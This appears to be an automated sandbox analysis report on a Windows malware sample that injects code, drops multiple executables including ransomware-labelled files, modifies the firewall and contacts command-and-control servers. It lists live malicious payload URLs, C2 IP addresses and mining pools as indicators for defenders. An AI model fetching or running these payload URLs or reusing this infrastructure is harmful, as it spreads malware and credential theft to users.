                          Source: Yara matchFile source: 35.2.gaystiqf.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.svchost.exe.2360000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.850000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000026.00000002.979557466.0000000002360000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.809196350.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.805779040.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.808208197.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.803426452.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000003.785124178.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.803137475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.809631719.0000000000850000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: E2A6.exe PID: 4752, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: gaystiqf.exe PID: 4588, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5288, type: MEMORYSTR
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                          Mitre Att&ck Matrix

                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Valid Accounts1Scripting1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools211Input Capture1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                          Default AccountsNative API531Valid Accounts1Valid Accounts1Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothIngress Tool Transfer15Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain AccountsExploitation for Client Execution1Windows Service14Access Token Manipulation1Scripting1Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesInput Capture1Automated ExfiltrationEncrypted Channel22Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local AccountsCommand and Scripting Interpreter3Logon Script (Mac)Windows Service14Obfuscated Files or Information3NTDSSystem Information Discovery227Distributed Component Object ModelInput CaptureScheduled TransferNon-Standard Port1SIM Card SwapCarrier Billing Fraud
                          Cloud AccountsService Execution3Network Logon ScriptProcess Injection713Software Packing33LSA SecretsSecurity Software Discovery551SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol5Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol36Jamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncVirtualization/Sandbox Evasion231Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading131/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Valid Accounts1Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronAccess Token Manipulation1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                          Compromise Software Supply ChainUnix ShellLaunchdLaunchdVirtualization/Sandbox Evasion231KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                          Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskProcess Injection713GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement
                          Trusted RelationshipPythonHypervisorProcess InjectionHidden Files and Directories1Web Portal CaptureCloud GroupsAttack PC via USB ConnectionLocal Email CollectionStandard Application Layer ProtocolInternal ProxyInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 553170 Sample: sbxGIUIhRd.exe Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 86 185.215.113.35, 49907, 49908, 49912 WHOLESALECONNECTIONSNL Portugal 2->86 88 185.163.204.24, 49930, 80 CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE Germany 2->88 90 7 other IPs or domains 2->90 112 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->112 114 Multi AV Scanner detection for domain / URL 2->114 116 Antivirus detection for URL or domain 2->116 118 22 other signatures 2->118 11 sbxGIUIhRd.exe 2->11         started        14 gaystiqf.exe 2->14         started        16 adijaeg 2->16         started        18 5 other processes 2->18 signatures3 process4 signatures5 156 Contains functionality to inject code into remote processes 11->156 158 Injects a PE file into a foreign processes 11->158 20 sbxGIUIhRd.exe 11->20         started        160 Detected unpacking (changes PE section rights) 14->160 162 Detected unpacking (overwrites its own PE header) 14->162 164 Writes to foreign memory regions 14->164 166 Allocates memory in foreign processes 14->166 23 svchost.exe 14->23         started        168 Machine Learning detection for dropped file 16->168 26 adijaeg 16->26         started        28 WerFault.exe 18->28         started        process6 dnsIp7 138 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 20->138 140 Maps a DLL or memory area into another process 20->140 142 Checks if the current machine is a virtual machine (disk enumeration) 20->142 30 explorer.exe 12 20->30 injected 92 microsoft-com.mail.protection.outlook.com 104.47.54.36, 25, 49849 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->92 94 patmushta.info 94.142.143.116, 443, 49853 IHOR-ASRU Russian Federation 23->94 144 System process connects to network (likely due to code injection or exploit) 23->144 146 Creates a thread in another existing process (thread injection) 26->146 signatures8 process9 dnsIp10 98 185.233.81.115, 443, 49791 SUPERSERVERSDATACENTERRU Russian Federation 30->98 100 81.163.30.181, 49926, 80 IR-RASANAPISHTAZIR Russian Federation 30->100 102 11 other IPs or domains 30->102 78 C:\Users\user\AppData\Roaming\adijaeg, PE32 30->78 dropped 80 C:\Users\user\AppData\Local\Temp\FA5C.exe, PE32 30->80 dropped 82 C:\Users\user\AppData\Local\Temp2A6.exe, PE32 30->82 dropped 84 11 other malicious files 30->84 dropped 104 System process connects to network (likely due to code injection or exploit) 30->104 106 Benign windows process drops PE files 30->106 108 Deletes itself after installation 30->108 110 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->110 35 CFE8.exe 30->35         started        38 E2A6.exe 2 30->38         started        41 95C6.exe 30->41         started        43 2 other processes 30->43 file11 signatures12 process13 file14 120 Detected unpacking (changes PE section rights) 35->120 122 Detected unpacking (overwrites its own PE header) 35->122 124 Found evasive API chain (may stop execution after checking mutex) 35->124 136 4 other signatures 35->136 74 C:\Users\user\AppData\Local\...\gaystiqf.exe, PE32 38->74 dropped 126 Machine Learning detection for dropped file 38->126 128 Uses netsh to modify the Windows network and firewall settings 38->128 130 Modifies the windows firewall 38->130 45 cmd.exe 38->45         started        48 cmd.exe 38->48         started        50 sc.exe 38->50         started        60 3 other processes 38->60 132 Injects a PE file into a foreign processes 41->132 52 95C6.exe 41->52         started        134 Antivirus detection for dropped file 43->134 55 FA5C.exe 43->55         started        58 WerFault.exe 23 9 43->58         started        signatures15 process16 dnsIp17 76 C:\Windows\SysWOW64\...\gaystiqf.exe (copy), PE32 45->76 dropped 62 conhost.exe 45->62         started        64 conhost.exe 48->64         started        66 conhost.exe 50->66         started        148 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 52->148 150 Maps a DLL or memory area into another process 52->150 152 Checks if the current machine is a virtual machine (disk enumeration) 52->152 154 Creates a thread in another existing process (thread injection) 52->154 96 86.107.197.138, 38133, 49901 MOD-EUNL Romania 55->96 68 conhost.exe 60->68         started        70 conhost.exe 60->70         started        72 conhost.exe 60->72         started        file18 signatures19 process20

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          sbxGIUIhRd.exe36%VirustotalBrowse
                          sbxGIUIhRd.exe49%ReversingLabsWin32.Trojan.Generic
                          sbxGIUIhRd.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\gaystiqf.exe100%AviraTR/Crypt.XPACK.Gen
                          C:\Users\user\AppData\Local\Temp\FA5C.exe100%AviraHEUR/AGEN.1211353
                          C:\Users\user\AppData\Local\Temp\8A6B.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Roaming\adijaeg100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\B3EB.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\96DB.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\CF17.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\CFE8.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\A15C.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\95C6.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\E2A6.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\BBBC.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\7D38.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\C487.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\gaystiqf.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\FA5C.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\7D38.exe34%MetadefenderBrowse
                          C:\Users\user\AppData\Local\Temp\7D38.exe77%ReversingLabsWin32.Ransomware.StopCrypt

                          Unpacked PE Files

                          SourceDetectionScannerLabelLinkDownload
                          18.3.CFE8.exe.650000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          39.2.FA5C.exe.ab0000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          19.2.E2A6.exe.560e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          39.0.FA5C.exe.400000.12.unpack100%AviraHEUR/AGEN.1145065Download File
                          21.0.FA5C.exe.530000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          39.0.FA5C.exe.ab0000.7.unpack100%AviraHEUR/AGEN.1211353Download File
                          16.2.95C6.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          18.2.CFE8.exe.630e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          1.0.sbxGIUIhRd.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          12.0.8A6B.exe.590e50.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          39.0.FA5C.exe.400000.4.unpack100%AviraHEUR/AGEN.1145065Download File
                          39.0.FA5C.exe.ab0000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                          12.0.8A6B.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          39.0.FA5C.exe.400000.6.unpack100%AviraHEUR/AGEN.1145065Download File
                          39.0.FA5C.exe.400000.8.unpack100%AviraHEUR/AGEN.1145065Download File
                          1.0.sbxGIUIhRd.exe.400000.2.unpack100%AviraHEUR/AGEN.1123244Download File
                          9.2.adijaeg.5615a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          38.3.svchost.exe.284d000.3.unpack100%AviraTR/Patched.GenDownload File
                          1.0.sbxGIUIhRd.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          39.2.FA5C.exe.400000.0.unpack100%AviraHEUR/AGEN.1145065Download File
                          35.2.gaystiqf.exe.630e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          13.2.95C6.exe.5615a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          12.2.8A6B.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          39.0.FA5C.exe.ab0000.9.unpack100%AviraHEUR/AGEN.1211353Download File
                          35.3.gaystiqf.exe.650000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          16.0.95C6.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          19.3.E2A6.exe.580000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          16.0.95C6.exe.400000.2.unpack100%AviraHEUR/AGEN.1123244Download File
                          39.0.FA5C.exe.ab0000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                          0.2.sbxGIUIhRd.exe.5615a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          18.2.CFE8.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          12.0.8A6B.exe.590e50.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          21.2.FA5C.exe.530000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          10.1.adijaeg.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          1.0.sbxGIUIhRd.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          1.0.sbxGIUIhRd.exe.400000.1.unpack100%AviraHEUR/AGEN.1123244Download File
                          1.0.sbxGIUIhRd.exe.400000.0.unpack100%AviraHEUR/AGEN.1123244Download File
                          19.2.E2A6.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                          1.2.sbxGIUIhRd.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          35.2.gaystiqf.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                          12.3.8A6B.exe.6f0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          10.0.adijaeg.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          12.0.8A6B.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          39.0.FA5C.exe.ab0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          16.0.95C6.exe.400000.3.unpack100%AviraHEUR/AGEN.1123244Download File
                          10.0.adijaeg.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          1.1.sbxGIUIhRd.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          39.0.FA5C.exe.ab0000.11.unpack100%AviraHEUR/AGEN.1211353Download File
                          21.0.FA5C.exe.530000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                          16.0.95C6.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          39.0.FA5C.exe.ab0000.5.unpack100%AviraHEUR/AGEN.1211353Download File
                          38.2.svchost.exe.2360000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                          1.0.sbxGIUIhRd.exe.400000.3.unpack100%AviraHEUR/AGEN.1123244Download File
                          21.0.FA5C.exe.530000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          16.0.95C6.exe.400000.1.unpack100%AviraHEUR/AGEN.1123244Download File
                          10.0.adijaeg.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          39.0.FA5C.exe.ab0000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          12.2.8A6B.exe.590e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          39.0.FA5C.exe.400000.10.unpack100%AviraHEUR/AGEN.1145065Download File
                          16.1.95C6.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          35.2.gaystiqf.exe.850000.2.unpack100%AviraBDS/Backdoor.GenDownload File
                          21.0.FA5C.exe.530000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                          39.0.FA5C.exe.ab0000.13.unpack100%AviraHEUR/AGEN.1211353Download File
                          38.3.svchost.exe.284d000.4.unpack100%AviraTR/Patched.GenDownload File
                          16.0.95C6.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          10.2.adijaeg.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          16.0.95C6.exe.400000.0.unpack100%AviraHEUR/AGEN.1123244Download File

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                          http://185.7.214.171:8080/6.php100%URL Reputationmalware
                          http://tempuri.org/0%URL Reputationsafe
                          http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                          http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/cae3f8ed633c3e67f112fa91bf9f9a15abbe29440%Avira URL Cloudsafe
                          http://185.215.113.35/d2VxjasuwS/index.php?scr=113%VirustotalBrowse
                          http://185.215.113.35/d2VxjasuwS/index.php?scr=10%Avira URL Cloudsafe
                          http://185.163.204.24/4%VirustotalBrowse
                          http://185.163.204.24/0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                          https://api.ip.sb/ip0%URL Reputationsafe
                          http://81.163.30.181/1.exe100%Avira URL Cloudmalware
                          http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                          http://data-host-coin-8.com/files/9030_1641816409_7037.exe100%Avira URL Cloudmalware
                          http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                          http://data-host-coin-8.com/game.exe0%URL Reputationsafe
                          http://tempuri.org/Entity/Id13Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id22Response0%URL Reputationsafe
                          https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                          https://get.adob0%URL Reputationsafe
                          http://tempuri.org/Entity/Id18Response0%URL Reputationsafe
                          http://185.215.113.35/d2VxjasuwS/plugins/cred.dll100%Avira URL Cloudmalware
                          https://disneyplus.com/legal.0%URL Reputationsafe
                          http://tempuri.org/Entity/Id3Response0%URL Reputationsafe
                          http://service.r0%URL Reputationsafe
                          http://185.215.113.35/d2VxjasuwS/index.php0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id90%URL Reputationsafe
                          http://tempuri.org/Entity/Id80%URL Reputationsafe
                          http://data-host-coin-8.com/files/6961_1642089187_2359.exe100%Avira URL Cloudmalware

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          pool-fr.supportxmr.com
                          		149.202.83.171
                          		truefalse
                            		high
                            unicupload.top
                            		54.38.220.85
                            		truefalse
                              		high
                              host-data-coin-11.com
                              		8.209.70.0
                              		truefalse
                                		high
                                patmushta.info
                                		94.142.143.116
                                		truefalse
                                  		high
                                  cdn.discordapp.com
                                  		162.159.135.233
                                  		truefalse
                                    		high
                                    privacy-tools-for-you-780.com
                                    		8.209.70.0
                                    		truefalse
                                      		high
                                      microsoft-com.mail.protection.outlook.com
                                      		104.47.54.36
                                      		truefalse
                                        		high
                                        goo.su
                                        		172.67.139.105
                                        		truefalse
                                          		high
                                          transfer.sh
                                          		144.76.136.153
                                          		truefalse
                                            		high
                                            data-host-coin-8.com
                                            		8.209.70.0
                                            		truefalse
                                              		high
                                              pool.supportxmr.com
                                              		unknown
                                              		unknownfalse
                                                		high

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://185.7.214.171:8080/6.phptrue
                                                • URL Reputation: malware
                                                		unknown
                                                http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/cae3f8ed633c3e67f112fa91bf9f9a15abbe2944true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://185.215.113.35/d2VxjasuwS/index.php?scr=1true
                                                • 13%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://185.163.204.24/true
                                                • 4%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://81.163.30.181/1.exetrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://data-host-coin-8.com/files/9030_1641816409_7037.exetrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://data-host-coin-8.com/game.exefalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://185.215.113.35/d2VxjasuwS/plugins/cred.dlltrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://185.215.113.35/d2VxjasuwS/index.phptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://data-host-coin-8.com/files/6961_1642089187_2359.exetrue
                                                • Avira URL Cloud: malware
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/02/sc/sctFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/chrome_newtabFA5C.exe, 00000027.00000002.1016026617.00000000030C9000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.976385152.0000000003007000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1075583600.000000000321E000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/ac/?q=FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://tempuri.org/Entity/Id12ResponseFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://tempuri.org/FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://tempuri.org/Entity/Id2ResponseFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://tempuri.org/Entity/Id21ResponseFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://support.google.com/chrome/?p=plugin_realFA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/faultFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsatFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://tempuri.org/Entity/Id15ResponseFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://api.ip.sb/ipFA5C.exe, 00000015.00000002.833273258.0000000003971000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.933081162.0000000000402000.00000040.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://tempuri.org/Entity/Id24ResponseFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingFA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://support.google.com/chrome/?p=plugin_shockwaveFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseFA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmpfalse
                                                                                                        		high
